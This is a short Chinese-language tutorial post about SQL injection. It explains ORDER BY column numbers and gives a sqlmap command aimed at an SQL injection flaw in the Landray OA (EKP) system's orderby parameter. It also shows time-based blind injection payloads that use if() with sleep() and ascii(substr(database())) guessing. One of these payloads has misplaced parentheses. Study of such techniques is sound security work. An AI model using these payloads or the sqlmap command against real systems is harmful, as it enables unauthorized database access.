注入点扩展

Posted prudent_l

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了注入点扩展相关的知识,希望对你有一定的参考价值。

1,order by 1是什么

select A,B  .......    order by 1表示安A排序,order by 2 表示安B排序

asc表示升序,desc表示降序

 

2,蓝凌OA(EKP)的sql注入漏洞语句:sqlmap -r sql.txt -p orderby --dbs

sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables

3,sql中的if怎么用?

if(条件,0,1)函数,当条件为真,返回0,假则返回1

多用于盲注,进行基于时间的盲注

?id=1\'and if(1=1,sleep(6),1) \'    这里的1‘ and  1=1为真,延时6秒(延时时间短,可通过发F12--网络查看)

确定基于时间的盲注可以利用后,利用二分法猜解数据库的每个数据

如1\' and if(ascii(substr(database(),1,1>95)),sleep(6),1 \'

 

以上是关于注入点扩展的主要内容,如果未能解决你的问题,请参考以下文章

02_dubbo的SPI

IE 扩展 - 注入 Javascript 文件

软件的可扩展性与框架的可交互性

给微软的依赖注入框架写一些扩展方法

如何通过 Chrome 扩展将 CSS 注入网页?

来自 Safari 扩展的注入脚本中的 AJAX